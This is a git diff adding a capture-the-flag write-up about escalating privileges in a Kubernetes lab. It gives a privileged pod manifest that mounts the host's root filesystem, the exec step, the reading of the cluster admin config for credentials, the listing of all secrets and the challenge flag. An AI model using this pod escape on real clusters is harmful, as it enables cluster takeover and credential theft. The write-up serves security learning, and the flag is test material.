1 files changed, 50 insertions, 0 deletions

diff --git a/punkctf/k8s_04.md b/punkctf/k8s_04.md
new file mode 100644
index 0000000..3212624
--- /dev/null
+++ b/punkctf/k8s_04.md
@@ -0,0 +1,50 @@
+
+Using `kubectl auth can-i --list` we find we still can't look at secrets directly, but we can create pods now.
+
+These pods don't have any security policy applied, meaning there are plenty of privesc routes we can take, most of them described [here](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation).
+
+Here is the pod i created:
+
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+  name: everything-allowed-exec-pod
+  labels:
+    app: pentest
+spec:
+  hostNetwork: true
+  hostPID: true
+  hostIPC: true
+  containers:
+  - name: everything-allowed-pod
+    image: busybox
+    imagePullPolicy: IfNotPresent
+    securityContext:
+      privileged: true
+    volumeMounts:
+    - mountPath: /host
+      name: noderoot
+    command: [ "/bin/sh", "-c", "--" ]
+    args: [ "while true; do sleep 30; done;" ]
+  volumes:
+  - name: noderoot
+    hostPath:
+      path: /
+```
+
+We can then `kubectl exec -it pod/everything-allowed-exec-pod sh` and explore the host filesystem at `/host`.
+
+Looking in `/host/etc/kubernetes/admin.conf` (the standard location for the cluster admin config), we get connection details to login as cluster admin:
+
+```
+users:
+- name: kubernetes-admin
+  user:
+    client-certificate-data: <long base64 string>
+    client-key-data: <long base64 string>
+```
+
+We put this in our terminals `.kube/config`, and use it to enumerate the secrets with `kubectl get secret -A`
+
+We find a secret in the `kube-system` namespace, from which we get the flag `punk_{3WPF4FB37UMJV31D}`